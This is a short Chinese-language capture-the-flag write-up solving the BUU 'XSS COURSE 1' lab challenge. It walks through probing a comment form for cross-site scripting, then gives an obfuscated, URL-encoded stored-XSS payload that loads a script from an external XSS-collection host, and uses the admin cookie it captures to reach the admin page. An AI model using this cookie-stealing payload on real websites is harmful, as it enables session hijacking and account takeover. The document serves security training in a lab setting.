BUU XSS COURSE 1

时间:2024-02-25 07:46:38

打开网页,发现有吐槽和登录两个窗口

尝试登录发现不行,也没有注册窗口,来到吐槽

 

输入的内容会在给的地址中显示出来

构造

<script>alert(1)</script>

 

 

访问给的地址/#/view/afb178d8-47ea-4a7a-f9e1-c34d5ac3eef7,没有发现内容

重新构造

<IMG SRC="javascript.:alert(\'XSS\');">

 

 

 

 发现一个打不开的图片,存在xss漏洞

 

靶机无法访问外网,用内网xss平台,注册一个账号,创建“我的项目”

</textarea>\'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.buuoj.cn%2F8sVXk7%22%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>

把xss代码在“吐槽”提交以后,访问一下给的地址,回到XSS平台的项目内容就可以看到两个刚接收到的内容,其中有一个是管理员访问。

admin

利用管理员的cookie,以及来访地址http://XXXXXXXXXXXXXXXXX.node3.buuoj.cn/backend/admin.php登录即可得到flag

flag

 

 

 

相关文章